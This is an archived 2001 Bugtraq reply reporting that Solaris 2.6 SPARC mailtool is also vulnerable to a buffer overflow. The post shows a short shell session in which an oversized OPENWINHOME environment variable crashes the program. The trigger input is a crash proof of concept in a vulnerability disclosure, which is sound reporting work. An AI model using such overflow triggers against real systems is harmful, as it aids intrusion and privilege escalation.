Bugtraq mailing list archives

RE: [synnergy] - Solaris mailtool(1) buffer overflow vulnerability

From: SChoe <schoe () CheapTickets COM>
Date: Tue, 29 May 2001 13:03:49 -1000 (HST)

dethy () synnergy net wrote:

[possibly others]


/usr/openwin/bin/mailtool for solaris 2.6 / SPARC is
also vulnerable to buffer overflow.

<------------------------snip-------------------------->
bash-2.04$ uname -a
SunOS <hostname> 5.6 Generic_105181-23 sun4u sparc
bash-2.04$ export OPENWINHOME=`perl -e 'print "A"x1010'`
bash-2.04$ /usr/local/bin/mailtool
Segmentation Fault
bash-2.04$
<------------------------snap-------------------------->


+--------------------------------------------------+
| Sung J. Choe / UNIX Admin / www.CheapTickets.com |
|                                                  |
|       Ph: 808/945.7439   Fax: 808/946.5993       |
:--------------------------------------------------+

Current thread:

[synnergy] - Solaris mailtool(1) buffer overflow vulnerability dethy (May 28)
- <Possible follow-ups>
- RE: [synnergy] - Solaris mailtool(1) buffer overflow vulnerability SChoe (May 30)